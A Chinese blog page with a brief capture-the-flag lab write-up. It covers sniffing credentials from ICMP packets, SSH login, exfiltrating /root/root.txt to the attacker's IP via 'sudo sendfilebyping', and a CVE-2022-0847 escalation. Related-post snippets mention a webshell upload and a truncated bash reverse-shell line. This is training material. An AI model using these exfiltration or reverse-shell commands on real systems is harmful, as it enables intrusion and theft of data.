靶机渗透日记

最新推荐文章于 2026-01-04 07:16:05 发布
原创 最新推荐文章于 2026-01-04 07:16:05 发布 · 353 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #渗透测试 #web安全

本文介绍了一种通过ping命令发送和接收数据的方法来获取敏感信息的过程。具体包括使用Wireshark抓包分析、通过监听ICMP请求包获取用户名密码、使用sendfilebyping命令发送文件,最终拼接得到Flag。

  1. 端口

    在这里插入图片描述

  2. 访问 80 端口

    在这里插入图片描述

    通过页面显示可以发现web尝试ping了访问者的IP地址

  3. 抓包使用wireshark分析

    监听

    tcpdump -i eth0 icmp -w icmp

    发现有四个请求包,其中两个包内含有用户名和密码

    在这里插入图片描述

    在这里插入图片描述

    在这里插入图片描述

    得到用户名和密码,使用ssh登录

  4. 执行sudo -l

    在这里插入图片描述

    通过ping命令发送文件

    本地监听

    tcpdump -i eth0 icmp -w rev

    服务器执行

    sudo sendfilebyping 192.168.0.128 /root/root.txt

    在这里插入图片描述

    将结果进行拼接得到flag

    在这里插入图片描述

    使用 CVE-2022-0847 提权

    在这里插入图片描述

# .
关注
靶机渗透日记 messages
Anonymous
02-26 439
IP 端口 访问 80 端口 两个功能点,一个是 chatbot ,一个是 Webmail 对这两部分进行目录扫描 发现在 /chatbot 目录下存在 后台登陆页面 寻找源码,关键字 Simple ChatBot Application 得到后台的默认密码,成功访问 登录到后台发现可以上传头像,上传一个 webshell ,这里上传一句话发现怎么都无法连接,并且我只能上传到 user_avatar ,上传到 bot_avatar 上会变成 jsp 后缀文件 在 /h..
靶机渗透日记 controller
Anonymous
02-25 1962
IP 端口 目录扫描 发现是 wordpress ,使用 wpscan 扫描一下,并没有发现存在漏洞的插件,但是扫描到了一个用户 control ,但是没有爆破出来 访问80端口 文档说明我们可以上传一个项目,并可以被运行 服务器还开放了 139,445 端口,访问 SMB 服务 可以匿名访问 上传 shell.txt import commands commands.getoutput('/bin/bash -c "/bin/bash -i >& /dev/t..
【工作日记15】渗透测试靶机搭建phpstydy+DVWA+pikachu
liu0yun的博客
07-08 1310
接上一篇,使用nmap发扫描时,发包速率可以通过发包时抓包,tcpdump -i wan host 192.168.1.3大致查看扫描过程1秒的发包数量。 靶机搭建参考文章: https://laolisafe.com/2114.html https://www.lywlbk.com/jiaocheng/496.html/ 另一种方法:https://www.cnblogs.com/p201721210007/p/12013026.html 资源:https://pan.baidu.com..
vulnhub渗透日记08:sickos1.2
ericalezl的博客
07-20 132
时间2023.7.19,靶场地址:https://www.vulnhub.com/entry/sickos-12,144/文章设计操作均为模拟环境,请勿在未授权时用于实际环境!
vulnhub渗透日记03:GoldenEye
ericalezl的博客
07-15 622
在本地/etc/hosts文件中添加域名severnaya-station.com。已知用户名Boris和Natalya,而且提示修改默认密码,估计可以爆破出来。在这里谁便写点东西,点击红框按钮,负责检测拼写的,点击即可收到shell。访问severnaya-station.com/gnocertdir。boris中的邮件没啥东西,natalya中发现如下信息。先得把这个设置为PSpellShell,save。提示访问/sev-home/登录。登录后提示pop3非默认端口。目标没有gcc,有cc。
vulnhub渗透日记07:IMF
ericalezl的博客
07-18 213
时间:2023.7.17,靶机来自vulnhub,本人水平一般,如有错误忘指正,感谢您的查阅!nmap只扫出个80端口 目录也没扫除啥 curl http://192.168.58.152,可以直接看到关键信息 看着像是base64编码,组合到一起解码 ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ== flag2{aW1mYWRtaW5pc3RyYXRvcg==} 解码为imfadministrator 作为目录访问 http://192.168.58.152/im
无网环境下的终端登录安全:一个被忽视的等保盲区
安当加密
01-01 791
在等保2.0全面落地的今天,大多数企业已部署防火墙、EDR、日志审计等纵深防御体系。。尤其在的环境中(如监控室、工控机房、财务内网终端),这一风险被进一步放大。
软考 系统架构设计师系列知识点之安全架构设计理论与实践(18)
phmatthaus的专栏
01-03 110
软考 系统架构设计师系列知识点之安全架构设计理论与实践(18)
安全隐私页面 Cordova&OpenHarmony 混合开发实战
2501_94444908的博客
12-29 505
本文介绍了家庭菜谱应用的安全隐私模块实现方案。该模块通过Cordova&OpenHarmony混合架构,Web层负责展示清理选项和确认对话框,ArkTS原生层执行实际数据操作。主要功能包括清除缓存和重置应用,通过不同按钮样式区分操作风险级别。清除缓存会删除临时文件,而重置应用则会清空所有菜谱数据。实现上采用"Web交互+原生执行"的安全分工模式,Web层处理用户确认和提示,原生层通过SecurityPlugin执行文件删除操作。该设计既保证了数据安全,又提供了良好的用户体验。
电子电器架构 --- 主机厂的安全理念(下)
Soly_kun的博客
12-29 206
摘要:本文以汽车电子工程师视角,探讨智能汽车时代的安全理念与实践。作者强调安全是主机厂的生命线,并重点分析了蔚来汽车的四大信息安全原则:最小权限原则从源头控制风险,零信任设计打破传统安全预设,分层纵深防御构建"云-管-端"防护体系。文章指出,在汽车智能化转型中,信息安全已成为维系用户信任的核心纽带,需要贯穿研发、生产、服务全流程。通过系统化的安全体系建设,才能应对日益复杂的网络安全挑战,守护用户生命财产安全。(149字)
Java 安全的单例模式详解
萧曳丶
01-01 368
单例模式是一种确保类只有一个实例并提供全局访问点的设计模式。文章详细介绍了多种实现方式:非安全的懒汉式、线程安全的饿汉式、同步方法懒汉式、双重检查锁、静态内部类以及枚举实现,并分析了各自的优缺点。特别强调了如何防止反射攻击、序列化破坏等安全隐患,提供了完整的安全单例示例。文章还比较了不同场景下的最佳实践方案,推荐简单场景用饿汉式,高安全要求用枚举实现,并介绍了现代Java中的Supplier和CompletableFuture实现方式。最后指出单例模式可能隐藏依赖关系、测试困难等问题,建议根据线程安全、性能
阿里千问安全审核大模型,本地部署,实测
12-29 721
大家好,我是 Ai 学习的老章
解锁高效安全办公新形态:信创云桌面的核心价值与行业实践
Raysync2025的博客
12-29 545
对于正走在信创深化之路上的组织而言,选择一个架构先进、生态开放、服务专业的云桌面平台,无疑将为未来的可持续发展奠定坚实的信息化基石。信创云桌面,并非简单的桌面环境虚拟化,而是以国产化核心技术为底座,构建的一套涵盖终端、接入、平台、应用与数据的完整体系。:采用高效的桌面传输协议,即使在复杂的专业图形设计、视频播放等场景下,也能保障用户获得接近本地PC的操作体验,且对网络带宽具备良好的适应性。:能够根据不同部门、岗位的需求,精准、敏捷地交付对应的桌面环境与应用,并对其全生命周期进行监控、优化与自动化管理。
vDisk VOI/IDV:Windows启动性能优化与安全部署攻略
最新发布
桌面虚拟化
01-04 65
vDisk VOI/IDV
如何快速识别游戏安全运营中外挂与多开用户?
2401_86761558的博客
12-29 951
本文从工程视角探讨IP在游戏反外挂与多开治理中的核心作用。文章指出IP作为连接账号、设备和网络的关键信号,具有天然聚集性和结构性特征,能够提供网络类型、地域稳定性等可计算风险特征。通过Python代码示例展示了IP查询在风控系统的实现方法,包括在线API调用和离线数据库方案,并给出完整的风险决策模型。最后针对不同场景推荐了IP数据库选型方案,强调IP数据应作为长期沉淀的安全能力而非简单接口调用。全文提供可直接落地的技术方案,为游戏安全防护提供实用参考。
如何搭建高速稳定安全的网络环境?住宅代理是关键
2501_94002910的博客
12-30 433
跨境业务中稳定的网络环境至关重要。普通代理常因易被识别、地理位置限制、稳定性差等问题影响业务,而住宅代理凭借真实IP、庞大IP池和高安全性成为更优选择。选择住宅代理需关注IP池规模、覆盖地区、纯净度等指标,并正确配置和定期维护。优质住宅代理能有效避免账号风控,提升业务成功率,是跨境业务的“数字地基”。
太阳能航空障碍灯:安全标识的新选择
ShenZhenDingYue的博客
12-29 835
高层建筑、输电线路、通信铁塔、风电机组等“高耸目标物”,一旦缺乏有效警示,极易对低空飞行器和夜航飞机造成安全隐患。在这一背景下,凭借其独立供电、节能环保、安装灵活等优势,逐步成为航空障碍标识领域的重要选择。相较传统市电型航空障碍灯,太阳能航空障碍灯不仅降低了施工与运维成本,也更符合当前“低碳、绿色、智能”的行业发展方向。本文将从多个维度,对太阳能航空障碍灯进行系统、深入的解析。,是指利用太阳能光伏板为能源,通过蓄电池储能,在夜间或低能见度条件下自动发光,用于标示高空或障碍物位置的航空安全警示灯具。
详解电子邮件安全:从SMTP到PGP再到DNSSEC的加固
2301_79797055的博客
12-29 1135
电子邮件系统是一个分布式架构,由邮件用户代理(MUA)、邮件传输代理(MTA)和邮件投递代理(MDA)组成,主要使用SMTP、POP3/IMAP和MIME协议。虽然TLS加密能保护传输安全,但邮件在MTA服务器上仍以明文存储,存在四大核心风险:身份伪造(SMTP协议缺乏身份认证)、数据窃听(明文传输)、数据篡改(缺少端到端完整性校验)以及恶意附件传播。这些安全隐患使得电子邮件容易遭受中间人攻击、信息泄露和欺诈等威胁,亟需更完善的安全机制来保护邮件内容和用户身份。
hackbox靶机渗透
10-15
好的,关于hackbox靶机渗透,我可以提供一些基本的信息和建议。首先,hackbox是一个虚拟机靶机,可以用于练习渗透测试技能。在渗透测试过程中,需要进行信息收集、漏洞扫描、漏洞利用等步骤。以下是一些可能有用的...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值